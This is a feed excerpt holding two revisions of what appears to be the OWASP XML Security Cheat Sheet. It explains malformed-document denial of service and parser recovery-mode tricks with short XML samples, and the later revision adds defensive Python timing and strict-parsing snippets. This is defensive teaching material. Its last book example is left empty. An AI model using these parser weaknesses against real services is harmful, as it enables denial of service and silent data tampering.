&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). The following variables should be analyzed when exploring this behavior:&lt;br /&gt;
&lt;br /&gt;
* Parser inner workings: Each parser has its own particularities, which may make them more or less susceptible to malformed documents, thus requiring more time.&lt;br /&gt;
* Document size: Processing a large well-formed document requires more time than doing the same for a smaller well-formed document. If the parser is susceptible, this also applies to malformed documents.&lt;br /&gt;
* Parser limitation: Parsers may be limited to processing no more than a set quantity of certain data types. Maximum limits for elements, attributes, or entities may be set by default or by the developers. For example, the Java API for XML processing (JAXP) limits each element to no more than 10,000 attributes.&lt;br /&gt;
* Architecture: The amount of computational resources available to the XML parser.&lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document Containing Unexpected Characters ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document using Normalization ===&lt;br /&gt;
Certain parsers may normalize the contents of your CDATA sections. This means that they will replace the special characters contained in the CDATA section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Well-Formed Document Including Content Modification ===&lt;br /&gt;
The contents of certain malformed documents could be altered after being recovered. Consider the scenario where a book is on sale unless the value of its &amp;quot;onsale&amp;quot; element is &amp;quot;no&amp;quot;:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;book&amp;gt;&lt;br /&gt;
  &amp;lt;item&amp;gt;ABC101&amp;lt;/item&amp;gt;&lt;br /&gt;
  &amp;lt;value&amp;gt;10&amp;lt;/value&amp;gt;&lt;br /&gt;
  &amp;lt;onsale&amp;amp;&amp;gt;no&amp;lt;/onsale&amp;gt;&lt;br /&gt;
  &amp;lt;onsalevalue&amp;gt;5&amp;lt;/onsalevalue&amp;gt;&lt;br /&gt;
&amp;lt;/book&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The onsale start tag above contains an &amp; character, which is not allowed in an element name. After document recovery, the value of that element may differ:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;book&amp;gt;&lt;br /&gt;
  &amp;lt;item&amp;gt;ABC101&amp;lt;/item&amp;gt;&lt;br /&gt;
  &amp;lt;value&amp;gt;10&amp;lt;/value&amp;gt;&lt;br /&gt;
  &amp;lt;onsale/&amp;gt;&lt;br /&gt;
  &amp;amp;amp;gt;no&lt;br /&gt;
  &amp;lt;onsalevalue&amp;gt;5&amp;lt;/onsalevalue&amp;gt;&lt;br /&gt;
&amp;lt;/book&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224121</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224121"/>
				<updated>2016-12-13T19:39:49Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
= Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, the violation must be treated as a fatal error and the data the document contains is considered malformed. Several tactics can produce a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
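&lt;br /&gt;
As a minimal sketch of this fail-fast behavior, the Python snippet below uses the standard library module xml.etree.ElementTree, which has no recovery mode and raises ParseError on malformed input. The helper name parse_strict and the sample documents are illustrative assumptions, not part of any particular application.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET


def parse_strict(data):
    """Return the root element, or None if the document is malformed.

    Hypothetical helper: ElementTree has no recovery mode, so any
    well-formedness violation raises ParseError and parsing stops.
    """
    try:
        return ET.fromstring(data)
    except ET.ParseError as err:
        # Report the error and perform no further processing.
        print("Rejected malformed document:", err)
        return None


# Build a well-formed document programmatically.
book = ET.Element("book")
ET.SubElement(book, "item").text = "ABC101"
well_formed = ET.tostring(book)

# Derive a malformed document by cutting off part of the closing tag.
malformed = well_formed[:-3]

accepted = parse_strict(well_formed)
rejected = parse_strict(malformed)
```

In this sketch the truncated document is rejected outright, so the application never sees a partially parsed tree.&lt;br /&gt;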
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, processing a malformed document may take longer than processing a well-formed one. When this happens, an attacker may mount an asymmetric resource consumption attack, exploiting the greater processing time to cause a Denial of Service (DoS). The following variables should be analyzed when exploring this behavior:&lt;br /&gt;
&lt;br /&gt;
* Parser inner workings: Each parser has its own particularities, which may make it more or less susceptible to malformed documents and thus require more time.&lt;br /&gt;
* Document size: Processing a large well-formed document requires more time than doing the same for a smaller well-formed document. If the parser is susceptible, this also applies to malformed documents.&lt;br /&gt;
* Parser limitation: Parsers may be limited to processing no more than a certain number of items of a given type. Maximum limits for elements, attributes, or entities may be set by default or by the developers. For example, the Java API for XML Processing (JAXP) limits each element to no more than 10,000 attributes.&lt;br /&gt;
* Architecture: The amount of computational resources available to the XML parser.&lt;br /&gt;
&lt;br /&gt;
The Apache Xerces-J XML parser may serve as an example of this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot; An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
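&lt;br /&gt;
One way to approach this check is to time the parser on a well-formed document and on a malformed variant of it. The Python sketch below does so with the standard library module xml.etree.ElementTree; the helper name parse_seconds, the document size, and the single truncation used to break the document are assumptions chosen for illustration. A real assessment would target the parser actually deployed and a wider range of malformed inputs.&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def parse_seconds(data, repeats=20):
    """Return the best-of-N wall-clock time spent parsing data.

    Malformed input is expected to raise ParseError; the time spent
    until the document is rejected is what matters here.
    """
    best = float("inf")
    for _ in range(repeats):
        start = time.perf_counter()
        try:
            ET.fromstring(data)
        except ET.ParseError:
            pass
        best = min(best, time.perf_counter() - start)
    return best


# Hypothetical sample: a well-formed document with 10,000 items.
root = ET.Element("items")
for i in range(10000):
    ET.SubElement(root, "item").text = str(i)
well_formed = ET.tostring(root)

# Same content with the end of the closing tag removed.
malformed = well_formed[:-3]

t_good = parse_seconds(well_formed)
t_bad = parse_seconds(malformed)
print("well-formed: %.4fs, malformed: %.4fs" % (t_good, t_bad))
```

If the malformed variant consistently takes much longer than the well-formed one, the parser version deserves a closer look before it is exposed to untrusted input.&lt;br /&gt;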
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and the results may differ from one parser to another. Processing recovered documents may therefore lead to unexpected data integrity issues.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate how a parser running in recovery mode may handle malformed or unusual input:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document Containing Unexpected Characters ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
   &amp;lt;!-- one&lt;br /&gt;
     &amp;lt;!-- another comment&lt;br /&gt;
   comment --&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document using Normalization ===&lt;br /&gt;
Certain parsers may normalize the contents of CDATA sections. This means that they replace the special characters contained in the CDATA section with their escaped (safe) equivalents, even though this is not required:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
   &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not common among parsers. Libxml may transform this document to its canonical version; although the result is well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
   &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
 &amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Well-Formed Document Including Content Modification ===&lt;br /&gt;
The contents of certain malformed documents could be altered after being recovered. Consider the scenario where a book is on sale unless the value of its &amp;quot;onsale&amp;quot; element is &amp;quot;no&amp;quot;:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	</feed>